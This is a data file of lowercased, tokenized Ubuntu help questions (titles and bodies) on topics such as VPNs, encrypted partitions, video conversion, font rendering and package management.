21003	what is the `` desktop couch scratch '' folder ?	what is the `` desktop couch scratch '' folder , and what do i do with it , if anything ?
21004	is there apt-cacher for windows ?	i have two computers . c1 : windows with internet connection . c2 : ubuntu connected with c1 but not connected with internet . i 'd like to access apt repositories to update or install some packages on ubuntu . i heard , apt-cacher is one of solutions , but i could n't find apt-cacher for windows ( it is only one , i have , with internet connection ) . please let me know how to do .
21006	getting connected to vpn but other sites not opening	i am on 10.10 and have been able to get connected to a vpn server . but the problem is i ca n't open any other sites when i am connected to vpn . it 's working in win though , where i was able to browse any sites and the vpn site at the same time without issues . must be i am missing something here . please help .
21007	postfix after insalling quickly ?	after attempting to install quickly with : sudo apt-get install quickly python-quickly-widgets i got a postfix ( mail daemon ) configuration screen . why do i need it to use quickly and how should i configure it ? i read/write mail on my browser ( gmail ... ) .
21010	app inventor for the ubuntu platform ?	will ubuntu have something like google app inventor to easily develop applications for the ubuntu platform ? is quickly intended to do that ? i heard ubuntu is planing to make easy and fun to develop for ubuntu platform . how is it going to be accomplished ?
21013	docky have stopped working since update	i 'm using the docky ppa , and since the latest update it wo n't start . if i run it from the terminal , this is what i get : [ info 09:21:19.005 ] docky version : 2.1.0 bzr docky r1761 ppa [ info 09:21:19.024 ] kernel version : 2.6.35.24 [ info 09:21:19.026 ] clr version : 2.0.50727.1433 [ debug 09:21:19.493 ] [ userargs ] buffertime = 0 [ debug 09:21:19.494 ] [ userargs ] maxsize = 2147483647 [ debug 09:21:19.494 ] [ userargs ] netbookmode = false [ debug 09:21:19.494 ] [ userargs ] nopollcursor = false [ debug 09:21:19.528 ] [ systemservice ] using org.freedesktop.upower for battery information [ info 09:21:19.564 ] [ themeservice ] setting theme : transparent [ debug 09:21:19.587 ] [ desktopitemservice ] loading remap file '/usr/share/docky/remaps.ini ' . [ debug 09:21:19.599 ] [ desktopitemservice ] remapping 'picasa3.exe ' to 'picasa ' . [ debug 09:21:19.599 ] [ desktopitemservice ] remapping 'nbexec ' to 'netbeans ' . [ debug 09:21:19.599 ] [ desktopitemservice ] remapping 'deja-dup-preferences ' to 'deja-dup ' . [ debug 09:21:19.599 ] [ desktopitemservice ] remapping 'virtualbox ' to 'virtualbox ' . [ warn 09:21:19.600 ] [ desktopitemservice ] could not find remap file '/home/lasse/.local/share/docky/remaps.ini ' ! [ debug 09:21:19.602 ] [ desktopitemservice ] loading desktop item cache '/home/lasse/.cache/docky/docky.desktop.en_dk.utf8.cache ' . [ info 09:21:20.101 ] [ dockservices ] dock services initialized . [ debug 09:21:20.134 ] [ dbusmanager ] dbus registered : org.gnome.docky [ debug 09:21:20.142 ] [ dbusmanager ] dbus registered : net.launchpad.dockmanager stacktrace : at ( wrapper managed-to-native ) system.io.monoio.read ( intptr , byte [ ] , int , int , system.io.monoioerror & ) < il 0x00012 , 0x00062 > at ( wrapper managed-to-native ) system.io.monoio.read ( intptr , byte [ ] , int , int , system.io.monoioerror & ) < il 0x00012 , 0x00062 > at system.io.filestream.readdata ( intptr , byte [ ] , int , int ) < il 0x00009 , 0x00047 > at system.io.filestream.refillbuffer ( ) < il 0x0001c , 0x0002b > at system.io.filestream.readbyte ( ) < il 0x00079 , 0x000c7 > at mono.addins.serialization.binaryxmlreader.readnext ( ) < il 0x0000b , 0x00031 > at mono.addins.serialization.binaryxmlreader.skip ( ) < il 0x0003c , 0x00053 > at mono.addins.serialization.binaryxmlreader.skip ( ) < il 0x00047 , 0x0005f > at mono.addins.serialization.binaryxmlreader.skip ( ) < il 0x00047 , 0x0005f > and this .skip ( ) continues infinitely , and very fast . i 've tried cleaning the cache and reinstalling docky , but without luck .
21018	how to install opencv ?	i am trying to learn image processing and obviously opencv is one of the best options . usually synaptic does all my installing work for me so i just checked the repos . but in the repos there is only on libcv1 and it is listed as 1.0.0-6.2ubuntu1 . does that mean it is version 1.0 of opencv ? also i found this page in community wiki https : //help.ubuntu.com/community/opencv it says i need to install libcv4 which is not in my repos . i also downloaded the source but it uses something called cmake , never used it before . is it similar to make ?
21019	what has been your experience with paid support from canonical ?	i am considering buying `` ubuntu desktop support '' from canonical for 2 reasons : i have a couple of issues that i would like professional help with . ( specifically a recurring kernel panic , and a slow wireless connection . ) i would like to lend a helping hand toward supporting ubuntu financially . however , i am a bit worried that once i transfer the money , they will end up just referring me to the bug tracker on launchpad . also , free support options like this site have the pleasant property that they are open to the internet , meaning that if my issue gets fixed , it is more likely to help others with the same problem . what does paying for support from canonical actually get you ?
21021	how to install jmol ?	i 'm a student of chemistry and i 'd like a piece of software to visualise molecules . i 've heard of 'jmol ' , but i ca n't get it installed . i 've downloaded jmol-12.1.16-full.tar.gz , what do i need to do with it ? thank you , philippe
21023	dolphin search toolbar is missing its text field . how can i get it back ?	a while ago , my search toolbar bar went missing in dolphin . i 'm referring to the search toolbar found under settings > toolbars shown > search toolbar . i used to sit at the very top right corner of the window . if the search toolbar is checked for view/unhide , the toolbar looks to activate something , as there is a slight shift in the interface buttons , but the text field is gone from the toolbar . i tried reconfiguring with dpkg , purging and reinstalling , etc . i left it alone as i thought it would be fixed in an update , but today i upgraded dolphin and it 's still gone . this appears to be a 4.6 bug or something . any thoughts ?
21024	convert old avi files to a modern format	we have a collection of old home videos that were saved in avi format a long time ago . i want to convert these files to a more modern format because the totem movie player that comes with ubuntu 10.4 seems to be the only program capable of playing them . the files seem to be encoded with a mjpeg codec , and playing them in vlc or windows media player plays only the sound but there is no video . avidemux was able to open the files , but the quality of the video is severely degraded : the video skips frames and is interlaced ( it 's not interlaced when playing it in totem ) . neither ffmpeg nor mencoder seems to be able to read the video stream . mencoder reports that it is using ffmpeg 's codec . here 's a section from its output : ========================================================================== opening video decoder : [ ffmpeg ] ffmpeg 's libavcodec codec family [ mjpeg @ 0x92a7260 ] mjpeg : using external huffman table [ mjpeg @ 0x92a7260 ] mjpeg : error using external huffman table , switching back to internal unsupported pixelformat -1 selected video codec : [ ffmjpeg ] vfm : ffmpeg ( ffmpeg mjpeg ) while running ffmpeg produces the following : $ ffmpeg -i input.avi output.avi ffmpeg version svn-r0.5.1-4:0.5.1-1ubuntu1 , copyright ( c ) 2000-2009 fabrice bellard , et al . configuration : -- extra-version=4:0.5.1-1ubuntu1 -- prefix=/usr -- enable-avfilter -- enable-avfilter-lavf -- enable-vdpau -- enable-bzlib -- enable-libgsm -- enable-libschroedinger -- enable-libspeex -- enable-libtheora -- enable-libvorbis -- enable-pthreads -- enable-zlib -- disable-stripping -- disable-vhook -- enable-runtime-cpudetect -- enable-gpl -- enable-postproc -- enable-swscale -- enable-x11grab -- enable-libdc1394 -- enable-shared -- disable-static libavutil 49.15 . 0 / 49.15 . 0 libavcodec 52.20 . 1 / 52.20 . 1 libavformat 52.31 . 0 / 52.31 . 0 libavdevice 52 . 1 . 0 / 52 . 1 . 0 libavfilter 0 . 4 . 0 / 0 . 4 . 0 libswscale 0 . 7 . 1 / 0 . 7 . 1 libpostproc 51 . 2 . 0 / 51 . 2 . 0 built on mar 4 2010 12:35:30 , gcc : 4.4.3 [ avi @ 0x87952c0 ] non-interleaved avi input # 0 , avi , from 'input.avi ' : duration : 00:00:15.24 , start : 0.000000 , bitrate : 22447 kb/s stream # 0.0 : video : mjpeg , yuvj422p , 720x544 , 25 tbr , 25 tbn , 25 tbc stream # 0.1 : audio : pcm_s16le , 44100 hz , stereo , s16 , 1411 kb/s output # 0 , avi , to 'output.avi ' : stream # 0.0 : video : mpeg4 , yuv420p , 720x544 , q=2-31 , 200 kb/s , 90k tbn , 25 tbc stream # 0.1 : audio : mp2 , 44100 hz , stereo , s16 , 64 kb/s stream mapping : stream # 0.0 - > # 0.0 stream # 0.1 - > # 0.1 press [ q ] to stop encoding frame= 0 fps= 0 q=0.0 lsize= 143kb time=15.23 bitrate= 76.9kbits/s video:0kb audio:119kb global headers:0kb muxing overhead 20.101777 % so the problem is that output does not contain any video , as evidenced by the video:0kb at the end . in all of the above cases the audio comes out fine . so my question is : what can i do to convert these files to a more modern format with more modern codecs ?
21025	mount a luks partition at boot	i have installed an ubuntu machine with two encrypted luks partitions : one for / and one for /home . i 've reinstalled the machine to upgrade to 10.04 . again , the / is installed using luks , and i 'm able to mount the /home using : mkdir /media/home sudo cryptsetup luksopen /dev/sda2 home sudo mount -t ext3 /dev/mapper/home /media/home the problem is , this cryptfs mapper disappears after boot , so i putting the appropriate line in fstab fails . how do i set the cryptfs to prompt for password and unlock the drive at boot ? thanks , adam
21026	ignore certain packages from ppa	i 've been using elementary desktop for a while , but after the last update , docky have broken . i 've tried using the docky stable ppa , but it is overridden by the elementary ppa , as they provide a newer version of docky . i would like to keep receiving updates to the elementary theme , but i would also like to use the older version of docky . is there any way i can do this , or do i simply have to file a bug and wait ?
21027	easy_install/pip or apt-get	as noted in the ubuntu wiki page on rails it is recommended that gems manages your rails/ruby dependencies . what is the best practise with python packages like django ? should i install them through apt-get or should i let easy_install/pip fetch them from pypi ?
21030	font rendering in firefox is blurry	a picture is worth a thousand words ... so does anyone know how to fix this font blurriness in firefox ? ( you 'll need to right-click the picture below go to view image to view it full-size ; it 's too small to see anything here . ) note : my other applications ( and the firefox non-client area , as you can see in the screen ) are completely fine , so obviously going to system- > appearance and changing the font settings is n't fixing the situation . edit : not letting web pages to use their own fonts also does n't help : see how the upper one is still sharper ? also , firefox 's own menu bar does n't render the same way as the page content ( menu bar below , page content above ) . they 're both segoe ui :
21033	what is the difference between gksudo and gksu ?	is there any difference between the behavior of gksu foo and gksudo foo ? can they be used interchangeably ?
21039	gvfs-afc-volume-monitor uses a lot of cpu	in my ubuntu 9.10 installation , i notice that the process gvfs-afc-volume-monitor causes my cpu core to go to 100 % ( that means for my dual-core machine to 50 % ) . killing this process helps , but i see it repeating later on ( not sure if this happens after restart/relogin or not ) . what can i do to prevent this from happening ?
21044	how to install vmware image on a hard drive partition	how to install vmware image on a hard drive partition ?
21046	good publishing tool	i am looking for a good publishing tool to write articles . i saw the book `` head first python '' from o'reily media and found it really interesting , the way they present things in the book . i am looking to organize my articles in similar fashion . i am looking for a similar publishing tool in ubuntu or windows . i would prefer a open source alternative . regards kiran
21050	reverse rendering of urdu fonts	i am working on a project that is based on urdu language in ubuntu platform . i 'm using python language and have almost achieved my task . the problem is that , the urdu text is rendered in reverse order . for example , consider the word کام ( which means work ) consisting of the three letters : ک , ا , and م the output is rendered in reverse order as ماک consisting of the three letters : م , ا , and ک when copying this text to open office or opening the generated xml file in firefox , the generated result is absolutely desired . i am using python 2.6 idle , its working perfect with windows platform , which clearly shows its not the problem of idle . am working on tkinter gui library . how can this problem be solved ?
21051	is it possible to use a bluetooth-enabled phone as handset ?	i 'd like to use my mobile phone ( nokia e71 ) as a handset for incoming calls in skype/empathy . i know this basically means that i have to configure it as a pulseaudio device , but i was n't able to do that . following a guide ( in italian , sorry ) , i installed pulseaudio-module-bluetooth and blueman , but the latter sees the phone as a `` smartphone '' , not allowing me choose other profiles . can you help me ? thanks
21052	kernel panic troubleshooting for dummies	i have made ubuntu my primary os since 10.04 , and i have converted many of my friends and neighbors into ubuntu users since then . i am the fix-it guy they approach when they encounter problems . the most frantic calls i get are when they encounter an `` update-induced kernel panic . '' ( many human beings are allergic to command-line interfaces and search engines . ) what are the step-by-step procedures to resolve an `` update-induced kernel panic '' ?
21056	can i limit the cpu usage of a single application ?	is there a way to stop clamscan eating my server cpu ?
21059	how do you install packetfence ?	was anyone able to install packetfence on ubuntu 10.10 ? i tried a tutorial , but did n't have any luck . some of the services installed and are working apache with php , snort , pfdetect , and pfdhcplistener . i can even get info from it , but for the life of me i ca n't get it to work with apache2 . when i run pfcmd service pf start i also get an error uninitialized value $ _ [ 7 ] in join at /usr/local/pf/lib/pf/class.pm line 170
21062	how to sync google docs with a folder in my filesystem ?	i 'd like to be able to edit my files offline and it would automatically send the changes to google docs and vice versa . is that even possible ? if so , how to do it ?
21066	openoffice calc : how can i count the number of different items with data pilot ?	i have a rather long spreadsheet with historical information of issues solved by some user on a collaborative environment . the spreadsheet have the following ( relevant ) columns date , week no. , project , author id , etc ... the week no . is calculated from the date , is basically the year concatenated with the week number within that year ; for instance , both 2009-02-18 and 2009-02-20 yield the week number 200908 - the 8th week of year 2009 ; and 2009-02-23 yields 200909 - the 9th week of year 2009 . i need to count how many different users ( given by author id ) contributed to some project , on a weekly basis . i have setup a data pilot with the week as row field , the project as the column field , and count-author as the data field . however , this counts the author id as different instances . this is not what i need . i need to count how many different users contributed to each project on a weekly basis . i expect to get something like : projects week project1 project2 project3 200901 10 2 200902 2 7 each inner cell containing how many different users contributed . with the count-author configuration , what i get is how many contributions ( total ) got the project on that week . is there a way to tell openoffice calc to do what i want ? update : following the suggestion given by other users , this question is now posted on super user : http : //superuser.com/questions/232339/openoffice-calc-how-can-i-count-the-number-of-different-items-with-data-pilot
21068	how to get disk usage from command line ?	how can i get the current disk usage ( in % ) of my hard drive from the command line ?
21070	how to add menu items in system menu	i want to insert an item to system menu : help and support about gnome about ubuntu more specifically , i want to insert a new item under `` about ubuntu '' . trying with alacarte does n't work . cloning `` ubuntu-about.desktop '' file and changing his attributes does n't work too ( i even rebooted the computer after that ) . searching for categories in `` /usr/share/desktop-directories '' have n't worked too , and searching for `` core '' and `` about '' entries in /etc/xdc/menus neither . it is n't as easy as i thought it would be . anyone have any suggestions ?
21075	reinstalling ubuntu	my hard disk partitioning scheme is like this : 30 gb root partition ( extended ) ( / ) 1.0 gb swap space ( extended ) 289 gb home partition ( extended ) ( /home ) i had made such a partitioning scheme assuming that i could perform a full re-install without disturbing my data . now if i am to do it ( re-install ubuntu ) , how should i proceed ?
21079	multitouch script ( using xinput ) no longer working	# ! /bin/bash # # list of synaptics device properties http : //www.x.org/archive/x11r7.5/doc/man/man4/synaptics.4.html # sect4 # list current synaptics device properties : xinput list-props ' '' synps/2 synaptics touchpad '' ' # sleep 5 # added delay ... xinput set-int-prop `` synps/2 synaptics touchpad '' `` device enabled '' 8 1 xinput -- set-prop -- type=int -- format=32 `` synps/2 synaptics touchpad '' `` synaptics two-finger pressure '' 4 xinput -- set-prop -- type=int -- format=32 `` synps/2 synaptics touchpad '' `` synaptics two-finger width '' 9 # below width 1 finger touch , above width simulate 2 finger touch . - value=pad-pixels xinput -- set-prop -- type=int -- format=8 `` synps/2 synaptics touchpad '' `` synaptics edge scrolling '' 1 1 0 # vertical , horizontal , corner - values : 0=disable 1=enable xinput -- set-prop -- type=int -- format=32 `` synps/2 synaptics touchpad '' `` synaptics jumpy cursor threshold '' 250 # stabilize 2 finger actions - value=pad-pixels # xinput -- set-prop -- type=int -- format=8 `` synps/2 synaptics touchpad '' `` synaptics tap action '' 0 0 0 0 1 2 3 # pad corners rt rb lt lb tap fingers 1 2 3 ( ca n't simulate more then 2 tap fingers afaik ) - values : 0=disable 1=left 2=middle 3=right etc . ( in ff 8=back 9=forward ) xinput -- set-prop -- type=int -- format=8 `` synps/2 synaptics touchpad '' `` synaptics two-finger scrolling '' 1 0 # vertical scrolling , horizontal scrolling - values : 0=disable 1=enable # xinput -- set-prop -- type=int -- format=8 `` synps/2 synaptics touchpad '' `` synaptics circular scrolling '' 1 # xinput -- set-prop -- type=int -- format=8 `` synps/2 synaptics touchpad '' `` synaptics circular scrolling trigger '' 3 hello everybody ... the above script allowed me to use happily multitouch for a month ... now if i do a two fingers scrolling the mouse cursor just runs on the screen like possessed ... any hints ?
21082	how can i disable the prefetch cache ?	i run a few ubuntu servers that have a load of django sites running on them . the sites and the httpd start at boot and after that ( apart from me sshing in to update it or using bzr to update websites ) nothing else gets run on it . at the moment over half the ram is allocated as cache . this is n't a problem because cache usually makes space or a little bit of it slips into swap ( again , this does n't really bother me ) but i do n't see the need for it . is there a quick way to disable the cache ? this is more of an experiment than anything else so it would be handy to know how to turn it back on again .
21088	can not mount a cifs network share over vpn	i have setup u vpn connection to our windows 2008 server at the office and it seems to work fine . for some reason , however , i still am not able to access the network shares over a vpn connection using my standard fstab entries . when i am physically connected to the network , it works fine , but now when trying this over vpn i get the following error : mount error ( 110 ) : connection timed out refer to the mount.cifs ( 8 ) manual page ( e.g . man mount.cifs ) my /etc/fstab looks like this : //server2008/share /mnt/share cifs iocharset=utf8 , credentials=/home/aron/.smbcredentials , uid=1000 0 0 as said , it works fine when physically connected , but over vpn it just wont work . any help is appreciated . edit : it seems the windows firewall is making things harder on me . when i turn it off , i get a bit further , although i still get the following error message : unable to find suitable address . the strange thing is that i have file sharing added as an exception to the firewall . port 137-139 and port 445 are open , which should suffice , should n't it ? edit jan 20th : still not working . when i have the firewall turned on , it times out . when i turn it off , i get the not suitable address error . turning the firewall off is not an option , by the way .
21093	why is it taking so long to open the ubuntu help center ?	when i click on the help center icon in the 'system ' menu , it takes more than a minute to launch the program . more than a minute , for a text only program seeming like a website ! all my other programs work fine , and i saw this problem also on other computers . is there a reason for this ? will it be fixed ? i think it is an important issue for beginners .
21097	configure fontconfig to ignore bitmaps in scalable fonts	i have the microsoft c-fonts installed , and they 're wonderful . however , calibri appears as a bitmap font in a lot of the sizes that it appears . how do i tell fontconfig to forbid calibri ( and cambria , etc . ) from being rendered from the embedded bitmaps ? i already have 70-no-bitmaps.conf in my /etc/fonts/conf.d/ directory . the fonts in question can be extracted from the powerpoint viewer .
21098	unable to shut down	after installing a wireless keyboard and mouse i can not shutdown my pc . i have tried to shut down from the console as well , but the result does n't change . how can resolve my problem ? thanks in advance ciao h .
21100	problem with script substitution when running script	i 'm new to linux so this probably should be an easy fix , but i can not see it . i have a script downloaded from official sources that is used to install additional tools for fsharp but it gives me a syntax error when running it . i tried to replace ( and ) by { and } but eventually it lead me to another error so i think this is not the problem since the script works for everybody . i read some articles that say that my bash version maybe is not the right one . i 'm using ubuntu 10.10 and here is the error : install-bonus.sh : 28 : syntax error : `` ( `` unexpected ( expecting `` } '' ) and this is line 27 , 28 and 29 : { declare -a dirs= ( `` $ { ! 3 } '' ) file= $ 2 and the full script : # ! /bin/sh -e prefix=/usr bin= $ prefix/bin man= $ prefix/share/man/man1/ die ( ) { echo `` $ 1 '' > & 2 echo `` installation aborted . '' > & 2 exit 1 } echo `` this script will install additional material for f # including '' echo `` man pages , fsharpc and fsharpi scripts and gtk # support for f # '' echo `` interactive ( root access needed ) '' echo `` '' # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # utility function that searches specified directories for a specified file # and if the file is not found , it asks user to provide a directory result= '' '' searchpaths ( ) { declare -a dirs= ( `` $ { ! 3 } '' ) file= $ 2 dir= $ { dirs [ 0 ] } for trydir in $ { dirs [ @ ] } do if [ -f $ trydir/ $ file ] then dir= $ trydir fi done while [ ! -f $ dir/ $ file ] do echo `` file ' $ file ' was not found in any of $ { dirs [ @ ] } . please enter $ 1 installation directory : '' read dir done result= $ dir } # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # locate f # installation directory - this is needed , because we want to # add environment variable with it , generate 'fsharpc ' and 'fsharpi ' and also # copy load-gtk.fsx to that directory # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- paths= ( $ 1 /usr/lib/fsharp /usr/lib/shared/fsharp ) searchpaths `` f # installation '' fsharp.core.dll paths [ @ ] fsharpdir= $ result echo `` successfully found f # installation directory . '' # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # check that we have everything we need # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- [ $ ( id -u ) -eq 0 ] || die `` please run the script as root . '' which mono > /dev/null || die `` mono not found in path . '' # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # make sure that all additional assemblies are in gac # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- echo `` installing additional f # assemblies to the gac '' gacutil -i $ fsharpdir/fsharp.build.dll gacutil -i $ fsharpdir/fsharp.compiler.dll gacutil -i $ fsharpdir/fsharp.compiler.interactive.settings.dll gacutil -i $ fsharpdir/fsharp.compiler.server.shared.dll # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # install additional files # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # install man pages echo `` installing additional f # commands , scripts and man pages '' mkdir -p $ man cp *.1 $ man # export the fsharp_compiler_bin environment variable if [ [ ! `` $ ostype '' =~ `` darwin '' ] ] ; then echo `` export fsharp_compiler_bin= $ fsharpdir '' > fsharp.sh mv fsharp.sh /etc/profile.d/ fi # generate 'load-gtk.fsx ' script for f # interactive ( ask user if we can not find binaries ) paths= ( /usr/lib/mono/gtk-sharp-2.0 /usr/lib/cli/gtk-sharp-2.0 /library/frameworks/mono.framework/versions/2.8/lib/mono/gtk-sharp-2.0 ) searchpaths `` gtk # '' gtk-sharp.dll paths [ @ ] gtkdir= $ result echo `` successfully found gtk # root directory . '' paths= ( /usr/lib/mono/gtk-sharp-2.0 /usr/lib/cli/glib-sharp-2.0 /library/frameworks/mono.framework/versions/2.8/lib/mono/gtk-sharp-2.0 ) searchpaths `` glib '' glib-sharp.dll paths [ @ ] glibdir= $ result echo `` successfully found glib # root directory . '' paths= ( /usr/lib/mono/gtk-sharp-2.0 /usr/lib/cli/atk-sharp-2.0 /library/frameworks/mono.framework/versions/2.8/lib/mono/gtk-sharp-2.0 ) searchpaths `` atk # '' atk-sharp.dll paths [ @ ] atkdir= $ result echo `` successfully found atk # root directory . '' paths= ( /usr/lib/mono/gtk-sharp-2.0 /usr/lib/cli/gdk-sharp-2.0 /library/frameworks/mono.framework/versions/2.8/lib/mono/gtk-sharp-2.0 ) searchpaths `` gdk # '' gdk-sharp.dll paths [ @ ] gdkdir= $ result echo `` successfully found gdk # root directory . '' cp bonus/load-gtk.fsx load-gtk1.fsx sed `` s , insertgtkpath , $ gtkdir , g '' load-gtk1.fsx > load-gtk2.fsx sed `` s , insertgdkpath , $ gdkdir , g '' load-gtk2.fsx > load-gtk3.fsx sed `` s , insertatkpath , $ atkdir , g '' load-gtk3.fsx > load-gtk4.fsx sed `` s , insertglibpath , $ glibdir , g '' load-gtk4.fsx > load-gtk.fsx rm load-gtk1.fsx rm load-gtk2.fsx rm load-gtk3.fsx rm load-gtk4.fsx mv load-gtk.fsx $ fsharpdir/load-gtk.fsx # generate 'fsharpc ' and 'fsharpi ' scripts ( using the f # path ) # 'fsharpi ' automatically searches f # root directory ( e.g . load-gtk ) echo `` # ! /bin/sh '' > fsharpc echo `` exec mono $ fsharpdir/fsc.exe -- resident \ '' \ $ @ \ '' '' > > fsharpc chmod 755 fsharpc echo `` # ! /bin/sh '' > fsharpi echo `` exec mono $ fsharpdir/fsi.exe -i : \ '' $ fsharpdir\ '' \ '' \ $ @ \ '' '' > > fsharpi chmod 755 fsharpi mv fsharpc $ bin/fsharpc mv fsharpi $ bin/fsharpi thanks a lot !
21101	how do i fix the gparted message : error while reading block at sector xxx ?	when i tried to move one of my partitions , i got some error messages . here are some extracts : move /dev/sda7 to the left 00:05:09 ( error ) ( ... ) check file system on /dev/sda7 for errors and ( if possible ) fix them 00:00:10 ( success ) e2fsck -f -y -v /dev/sda7 ( ... ) move file system to the left 00:04:52 ( error ) perform read-only test 00:04:52 ( error ) using internal algorithm read 114013242 sectors finding optimal blocksize ( ... ) read 113357882 sectors using a blocksize of 1024 sectors 00:04:36 ( error ) 22527034 of 113357882 read error while reading block at sector 385849832 23182394 sectors read ( error ) ( ... ) libparted messages ( info ) input/output error during read on /dev/sda what should i do to effectively move my partition ?
21104	how can i edit my httpd.conf file ?	i have xampp installed , and need to edit my httpd.conf file to add a virtual host block . if i right-click on the file in nautilus and open with gedit , i can see all the content , but it 's read-only . if i try to open it via terminal , like this : esther @ estherlinuxsony : ~ $ sudo gedit opt/lampp/etc/extra/httpd-vhosts.conf it opens the root version of gedit , but there 's no content in the file . how can i edit this file ?
21115	moving from ubuntu netbook to ubuntu desktop	i do n't like the way of working with the 10.10 netbook and want to use desktop . i 'm using wubi and i 'm new to ubuntu ! is there a way , simple switch between those two ?
21118	good tutorial on grep , sort , unique and tools like that	i do n't even know how those tools are called together , but i think they make linux a very powerful os . do you know any good tutorials to learn those ?
21119	how do i get an m-audio keystudio 25 to work ?	has anyone been able to use any m-audio midi devices successfully ? ( the box says mac only ) . i am using an m-audio keystudio 25 .
21120	how to join a windows domain and map network drives ?	i just installed the current build for ubuntu on a partition for my work computer . i am a novice when it comes to linux/ubuntu , which is why i installed it along side windows . i want to learn how to operate and use ubuntu much more than i do now , so i figured installing it and trying to do day to day functions here would be a `` thrown into the pool with sharks '' way to do it , and i like that way . i did however have a few questions : we are on a domain in windows , is there any way to join that domain using the ubuntu partition ? we also have 16 mapped network drives . i do n't actually need all of them mapped for ubuntu , but is there a way to map at least one of them to see/use here in ubuntu . outlook corporate email , how can i sign in/use it while ... well , you get the idea . as i said earlier , i am very new to ubuntu , i 've only played around with it a bit at home and never at the office . if you could simplify it down for me a bit , that would be great .
21122	notes showing in tomboy but not on ubuntu one - ca n't delete	i have the following problem with tomboy notes . there are some notes that i can not delete . the delete button is greyed out . if i look on ubuntu one , under notes , these notes do not show in the left pane but show under recent activity . eg `` # ( untitled 10 ) was updated '' how can i delete these notes and clean up my tomboy app ? thanks
21125	will it be possible to autohide indicators in some way in the future ?	currently i have way to many indicators/icons on my system tray . is it possible that auto hide will be added in future ubuntu versions ?
21131	how to correctly remove openjdk/openjre and set sunjdk/sunjre as default	ubuntu seems to favour openjdk/jre very much over sun jdk/jre . even after i installed sun jre , jdk and plugin and spent some time plucking out openjdk-related packages , apt-get has installed them back with some packages as a dependency . can this behaviour be corrected in favour of sun java packages ? i 'd like to have one and only java stack installed ( yes , it 's a bit of ocd , but i like to have my systems clean ) and want it to be sun java . update : as marcos roriz notes , the problem seems to be in default-jre ( on which java-dependent packages use to depend ) pointing to openjdk , so the question seems to go about how to hack default-jre/default-jdk to point to sun java .
21136	how to debug bash script ?	is there any way to debug bash script without using echo and logging ? i 'm talking about using breakpoints and stuff like that .
21142	is there a ext3 defragmenter ?	is there any defragmenter out there for ext3 ?
21144	nvidia how do i get three monitors working ?	my workstation has two geforce 7300gts and three monitors , and i 'd like to put them to good use . dual monitors works out of the box , but triple does n't . how can i get the third monitor up and going when the monitor prefs dialog only shows two ?
21145	how can i check processor flags inside a preseed install ?	i have a postinstall script that runs after my preseed install that checks /proc/cpuinfo for vmx or svm flags and if the server has them , it installs kvm packages . the only problem is due to the install running in a chroot /target directory , there is no /proc/cpuinfo to look at . the `` lshw '' command does n't have the goods either . any thoughts on how this can otherwise be accomplished ?
21146	how to correctly install the latest mono , moonlight and monodevelop instead of the version in ubuntu repository ?	i would like to have the latest stable ( 2.8 ) mono stack ( mono , moonlight with firefox plugin , monodevelop , monodoc , etc ) on ubuntu 10.10 not have any remains of old mono 2.6 which is available in ubuntu repos , get all the mono-depending packages satisfied ( i am afraid they will complain if i do n't install mono 2.6 from packages and install manually downloaded mono 2.8 instead ) how do i acheive this ?
21148	openoffice calc - sheet tabs and buttons	the sheet tabs in open office calc appear very pixelated to me . also the buttons to change tabs are very tiny . screenshot : is there a way to fix this appearance ? all the functionality is there , but it 's bugging me . hopefully this helps some other people too .
21151	any way to easily rip blu-ray disks ?	i 've seen the documentation on blu-ray restricted formats here but i 'm looking to see if anyone has come up with an easy solution yet ? also it would be awesome if someone knows of any type of program that provides mkv compression .
21154	what ides are there for android development ?	i recently bought my first android phone ( htc legend ) . now i want to develop for it ! ! : ) is it possible under ubuntu and what is the best tool ? eclipse or intellij or maybe something else ? upd : it takes about a year for me ( sorry my lazyness ; ) but this is my first android app - https : //market.android.com/details ? id=com.maxsoft.balls created by eclipse + adt in ubuntu 11.10 !
21161	fan making noise while running ubuntu	hi i have a newly installed version of ubuntu 10.10 on my laptop . when i run windows , the fan is working properly and is not making sound . but when i run ubuntu , its making sound and is runnning more faster . what could be the problem . is there any way of rectifying it .
21163	best format for cinelerra video editor	what is the best input format for cinelerra ? i have tried various combinations of video and audio formats , but none has worked so far . advance thanks !
21170	why all my iphone contacts are n't synced with ubuntu one contacts ?	i have more than 100 contacts on my iphone . when i sync with ubuntu one app , only 44 contacts appears in ubuntu one ... what is the problem ? what can i do to have all my contacts sync ?
21171	how to ban an ip temporarily after several incorrect password attempts ?	my new server got hacked ( sigh ) . i have physical access to my machine . it seems like the only changes made was a new user account created and a broken /etc/sudoers file . it seems as though the password was discovered by dictionary attack . after i fix these problems ( or do a full re-install ? ) , i want to add a mechanism to ban an ip ( for maybe 24 hours or some time limit ) after getting the password wrong x number of times , but i 'm not a unix sysadmin or anything , so i 'm not really sure where to get started . what software should i use and how can i configure it ? thanks .
21173	can ping other machines but other machines can not ping me	inside the virtual machine , running ubuntu , i can ping outside machines and can even connect to the internet , but outside machines can not ping me except my host windows machine , the vmware image use bridge mode and the ip of the ubuntu is get from dhcp . what could be catchy here and how to diagnose it ? thanks .
